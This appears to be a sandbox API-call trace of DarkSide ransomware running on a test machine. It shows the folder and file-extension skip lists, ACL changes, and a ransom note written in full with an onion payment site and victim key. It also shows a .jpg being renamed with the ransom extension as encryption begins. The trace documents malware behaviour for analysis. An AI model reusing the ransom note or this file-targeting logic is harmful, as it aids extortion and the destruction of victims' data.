returned 0x7 [0167.406] _wcsicmp (_Str1="appdata", _Str2="EUipMAzv61Xk2n2") returned -4 [0167.406] wcslen (_String="appdata") returned 0x7 [0167.406] _wcsicmp (_Str1="application data", _Str2="EUipMAzv61Xk2n2") returned -4 [0167.406] wcslen (_String="application data") returned 0x10 [0167.406] _wcsicmp (_Str1="boot", _Str2="EUipMAzv61Xk2n2") returned -3 [0167.406] wcslen (_String="boot") returned 0x4 [0167.406] _wcsicmp (_Str1="google", _Str2="EUipMAzv61Xk2n2") returned 2 [0167.406] wcslen (_String="google") returned 0x6 [0167.406] _wcsicmp (_Str1="mozilla", _Str2="EUipMAzv61Xk2n2") returned 8 [0167.406] wcslen (_String="mozilla") returned 0x7 [0167.406] _wcsicmp (_Str1="program files", _Str2="EUipMAzv61Xk2n2") returned 11 [0167.406] wcslen (_String="program files") returned 0xd [0167.406] _wcsicmp (_Str1="program files (x86)", _Str2="EUipMAzv61Xk2n2") returned 11 [0167.406] wcslen (_String="program files (x86)") returned 0x13 [0167.406] _wcsicmp (_Str1="programdata", _Str2="EUipMAzv61Xk2n2") returned 11 [0167.406] wcslen (_String="programdata") returned 0xb [0167.406] _wcsicmp (_Str1="system volume information", _Str2="EUipMAzv61Xk2n2") returned 14 [0167.406] wcslen (_String="system volume information") returned 0x19 [0167.406] _wcsicmp (_Str1="tor browser", _Str2="EUipMAzv61Xk2n2") returned 15 [0167.406] wcslen (_String="tor browser") returned 0xb [0167.407] _wcsicmp (_Str1="windows.old", _Str2="EUipMAzv61Xk2n2") returned 18 [0167.407] wcslen (_String="windows.old") returned 0xb [0167.407] _wcsicmp (_Str1="intel", _Str2="EUipMAzv61Xk2n2") returned 4 [0167.407] wcslen (_String="intel") returned 0x5 [0167.407] _wcsicmp (_Str1="msocache", _Str2="EUipMAzv61Xk2n2") returned 8 [0167.407] wcslen (_String="msocache") returned 0x8 [0167.407] _wcsicmp (_Str1="perflogs", _Str2="EUipMAzv61Xk2n2") returned 11 [0167.407] wcslen (_String="perflogs") returned 0x8 [0167.407] _wcsicmp (_Str1="x64dbg", _Str2="EUipMAzv61Xk2n2") returned 19 [0167.407] wcslen (_String="x64dbg") returned 0x6 [0167.407] _wcsicmp (_Str1="public", _Str2="EUipMAzv61Xk2n2") returned 11 [0167.407] wcslen (_String="public") returned 0x6 [0167.407] _wcsicmp (_Str1="all users", _Str2="EUipMAzv61Xk2n2") returned -4 [0167.407] wcslen (_String="all users") returned 0x9 [0167.407] _wcsicmp (_Str1="default", _Str2="EUipMAzv61Xk2n2") returned -1 [0167.407] wcslen (_String="default") returned 0x7 [0167.407] wcscpy (in: _Dest=0x32c20a0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\*" [0167.407] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\*") returned 0x5a [0167.407] wcscpy (in: _Dest=0x32c2152, _Source="EUipMAzv61Xk2n2" | out: _Dest="EUipMAzv61Xk2n2") returned="EUipMAzv61Xk2n2" [0167.407] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32e20b0 [0167.407] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32f20b8 [0167.409] wcscpy (in: _Dest=0x32e20b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\EUipMAzv61Xk2n2" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\EUipMAzv61Xk2n2") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\EUipMAzv61Xk2n2" [0167.409] GetNamedSecurityInfoW () returned 0x0 [0167.409] SetEntriesInAclW () returned 0x0 [0167.409] SetNamedSecurityInfoW () returned 0x0 [0167.411] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c1a8) returned 1 [0167.411] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32deec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.411] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\EUipMAzv61Xk2n2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g\\euipmazv61xk2n2")) returned 1 [0167.411] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.411] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g\\euipmazv61xk2n2\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.412] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32debc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32debc*=0x7ca, lpOverlapped=0x0) returned 1 [0167.413] CloseHandle (hObject=0x1bc) returned 1 [0167.413] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.414] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\EUipMAzv61Xk2n2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g\\euipmazv61xk2n2")) returned 0x10 [0167.414] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\EUipMAzv61Xk2n2" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\EUipMAzv61Xk2n2\\") returned="" [0167.414] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\EUipMAzv61Xk2n2\\") returned 0x69 [0167.414] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\EUipMAzv61Xk2n2\\*", fInfoLevelId=0x0, lpFindFileData=0x32e11c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e11c) returned 0x154288 [0167.414] FindNextFileW (in: hFindFile=0x154288, lpFindFileData=0x32e11c | out: lpFindFileData=0x32e11c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x848369f0, ftCreationTime.dwHighDateTime=0x1d5e75c, ftLastAccessTime.dwLowDateTime=0x917ae600, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x917ae600, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.415] FindNextFileW (in: hFindFile=0x154288, lpFindFileData=0x32e11c | out: lpFindFileData=0x32e11c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917ae600, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x917ae600, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x917d4760, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.415] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.415] FindNextFileW (in: hFindFile=0x154288, lpFindFileData=0x32e11c | out: lpFindFileData=0x32e11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.416] FindClose (in: hFindFile=0x154288 | out: hFindFile=0x154288) returned 1 [0167.416] _wcsicmp (_Str1="backup", _Str2="EUipMAzv61Xk2n2") returned -3 [0167.416] wcslen (_String="backup") returned 0x6 [0167.416] _wcsicmp (_Str1="bak", _Str2="EUipMAzv61Xk2n2") returned -3 [0167.416] wcslen (_String="bak") returned 0x3 [0167.416] _wcsicmp (_Str1="back", _Str2="EUipMAzv61Xk2n2") returned -3 [0167.416] wcslen (_String="back") returned 0x4 [0167.416] _wcsicmp (_Str1="archive", _Str2="EUipMAzv61Xk2n2") returned -4 [0167.416] wcslen (_String="archive") returned 0x7 [0167.416] _wcsicmp (_Str1="bckp", _Str2="EUipMAzv61Xk2n2") returned -3 [0167.416] wcslen (_String="bckp") returned 0x4 [0167.416] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32e20b0) returned 1 [0167.416] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32f20b8) returned 1 [0167.416] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917ae600, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x917ae600, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x917ae600, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.416] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.416] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde3ab9e0, ftCreationTime.dwHighDateTime=0x1d5daa4, ftLastAccessTime.dwLowDateTime=0xc967de10, ftLastAccessTime.dwHighDateTime=0x1d5defc, ftLastWriteTime.dwLowDateTime=0xc967de10, ftLastWriteTime.dwHighDateTime=0x1d5defc, nFileSizeHigh=0x0, nFileSizeLow=0x1476a, dwReserved0=0x0, dwReserved1=0x0, cFileName="tuVmYAFcNy3ce9A9DK.jpg", cAlternateFileName="TUVMYA~1.JPG")) returned 1 [0167.416] _wcsicmp (_Str1="tuVmYAFcNy3ce9A9DK.jpg", _Str2="README.c06622a1.TXT") returned 2 [0167.416] wcsstr (_Str="tuVmYAFcNy3ce9A9DK.jpg", _SubStr="README") returned 0x0 [0167.416] _wcsicmp (_Str1="autorun.inf", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -19 [0167.416] wcslen (_String="autorun.inf") returned 0xb [0167.416] _wcsicmp (_Str1="boot.ini", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -18 [0167.416] wcslen (_String="boot.ini") returned 0x8 [0167.416] _wcsicmp (_Str1="bootfont.bin", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -18 [0167.416] wcslen (_String="bootfont.bin") returned 0xc [0167.416] _wcsicmp (_Str1="bootsect.bak", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -18 [0167.416] wcslen (_String="bootsect.bak") returned 0xc [0167.416] _wcsicmp (_Str1="desktop.ini", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -16 [0167.416] wcslen (_String="desktop.ini") returned 0xb [0167.416] _wcsicmp (_Str1="iconcache.db", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -11 [0167.417] wcslen (_String="iconcache.db") returned 0xc [0167.417] _wcsicmp (_Str1="ntldr", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -6 [0167.417] wcslen (_String="ntldr") returned 0x5 [0167.417] _wcsicmp (_Str1="ntuser.dat", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -6 [0167.417] wcslen (_String="ntuser.dat") returned 0xa [0167.417] _wcsicmp (_Str1="ntuser.dat.log", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -6 [0167.417] wcslen (_String="ntuser.dat.log") returned 0xe [0167.417] _wcsicmp (_Str1="ntuser.ini", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -6 [0167.417] wcslen (_String="ntuser.ini") returned 0xa [0167.417] _wcsicmp (_Str1="thumbs.db", _Str2="tuVmYAFcNy3ce9A9DK.jpg") returned -13 [0167.417] wcslen (_String="thumbs.db") returned 0x9 [0167.417] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.417] wcslen (_String="386") returned 0x3 [0167.417] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.417] wcslen (_String="adv") returned 0x3 [0167.417] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.417] wcslen (_String="ani") returned 0x3 [0167.417] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.417] wcslen (_String="bat") returned 0x3 [0167.417] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.417] wcslen (_String="bin") returned 0x3 [0167.417] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.417] wcslen (_String="cab") returned 0x3 [0167.417] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.417] wcslen (_String="cmd") returned 0x3 [0167.417] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.417] wcslen (_String="com") returned 0x3 [0167.417] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.417] wcslen (_String="cpl") returned 0x3 [0167.417] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.417] wcslen (_String="cur") returned 0x3 [0167.417] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.417] wcslen (_String="deskthemepack") returned 0xd [0167.417] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.417] wcslen (_String="diagcab") returned 0x7 [0167.417] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.418] wcslen (_String="diagcfg") returned 0x7 [0167.418] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.418] wcslen (_String="diagpkg") returned 0x7 [0167.418] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.418] wcslen (_String="dll") returned 0x3 [0167.418] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.418] wcslen (_String="drv") returned 0x3 [0167.418] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.418] wcslen (_String="exe") returned 0x3 [0167.418] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.418] wcslen (_String="hlp") returned 0x3 [0167.418] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.418] wcslen (_String="icl") returned 0x3 [0167.418] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.418] wcslen (_String="icns") returned 0x4 [0167.418] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.418] wcslen (_String="ico") returned 0x3 [0167.418] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.418] wcslen (_String="ics") returned 0x3 [0167.418] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.418] wcslen (_String="idx") returned 0x3 [0167.418] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.418] wcslen (_String="ldf") returned 0x3 [0167.418] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.418] wcslen (_String="lnk") returned 0x3 [0167.418] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.418] wcslen (_String="mod") returned 0x3 [0167.418] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.418] wcslen (_String="mpa") returned 0x3 [0167.418] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.418] wcslen (_String="msc") returned 0x3 [0167.418] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.418] wcslen (_String="msp") returned 0x3 [0167.418] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.418] wcslen (_String="msstyles") returned 0x8 [0167.419] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.419] wcslen (_String="msu") returned 0x3 [0167.419] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.419] wcslen (_String="nls") returned 0x3 [0167.419] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.419] wcslen (_String="nomedia") returned 0x7 [0167.419] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.419] wcslen (_String="ocx") returned 0x3 [0167.419] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.419] wcslen (_String="prf") returned 0x3 [0167.419] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.419] wcslen (_String="ps1") returned 0x3 [0167.419] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.419] wcslen (_String="rom") returned 0x3 [0167.419] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.419] wcslen (_String="rtp") returned 0x3 [0167.419] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.419] wcslen (_String="scr") returned 0x3 [0167.419] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.419] wcslen (_String="shs") returned 0x3 [0167.419] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.419] wcslen (_String="spl") returned 0x3 [0167.419] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.419] wcslen (_String="sys") returned 0x3 [0167.419] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.419] wcslen (_String="theme") returned 0x5 [0167.419] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.419] wcslen (_String="themepack") returned 0x9 [0167.419] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.419] wcslen (_String="wpx") returned 0x3 [0167.419] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.419] wcslen (_String="lock") returned 0x4 [0167.419] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.419] wcslen (_String="key") returned 0x3 [0167.419] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.419] wcslen (_String="hta") returned 0x3 [0167.420] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.420] wcslen (_String="msi") returned 0x3 [0167.420] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.420] wcslen (_String="pdb") returned 0x3 [0167.420] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.420] wcslen (_String="sqlite") returned 0x6 [0167.420] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g")) returned 0x10 [0167.420] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.420] wcscpy (in: _Dest=0x3480048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G" [0167.420] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G") returned 0x58 [0167.420] wcscpy (in: _Dest=0x34800fa, _Source="tuVmYAFcNy3ce9A9DK.jpg" | out: _Dest="tuVmYAFcNy3ce9A9DK.jpg") returned="tuVmYAFcNy3ce9A9DK.jpg" [0167.420] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\tuVmYAFcNy3ce9A9DK.jpg", dwFileAttributes=0x80) returned 1 [0167.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\tuVmYAFcNy3ce9A9DK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g\\tuvmyafcny3ce9a9dk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0167.420] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.420] ReadFile (in: hFile=0x1e4, lpBuffer=0x32e224, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e2b4, lpOverlapped=0x0 | out: lpBuffer=0x32e224*, lpNumberOfBytesRead=0x32e2b4*=0x90, lpOverlapped=0x0) returned 1 [0167.421] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e224, Length=0x80) returned 0xdf1c85ad [0167.421] RtlComputeCrc32 (PartialCrc=0x85ad, Buffer=0x32e224, Length=0x80) returned 0x6e0775fb [0167.421] RtlComputeCrc32 (PartialCrc=0x75fb, Buffer=0x32e224, Length=0x80) returned 0x27d53454 [0167.421] RtlComputeCrc32 (PartialCrc=0x3454, Buffer=0x32e224, Length=0x80) returned 0xadfb1d03 [0167.421] RtlComputeCrc32 (PartialCrc=0x1d03, Buffer=0x32e224, Length=0x80) returned 0xe0f3e978 [0167.421] CloseHandle (hObject=0x1e4) returned 1 [0167.422] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32e20b0 [0167.422] wcscpy (in: _Dest=0x32e20b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\tuVmYAFcNy3ce9A9DK.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\tuVmYAFcNy3ce9A9DK.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\tuVmYAFcNy3ce9A9DK.jpg" [0167.422] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\tuVmYAFcNy3ce9A9DK.jpg") returned 0x6f [0167.422] wcscpy (in: _Dest=0x32e218e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.422] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\tuVmYAFcNy3ce9A9DK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g\\tuvmyafcny3ce9a9dk.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\tuVmYAFcNy3ce9A9DK.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g\\tuvmyafcny3ce9a9dk.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\tuVmYAFcNy3ce9A9DK.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g\\tuvmyafcny3ce9a9dk.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e4 [0167.426] CreateIoCompletionPort (FileHandle=0x1e4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 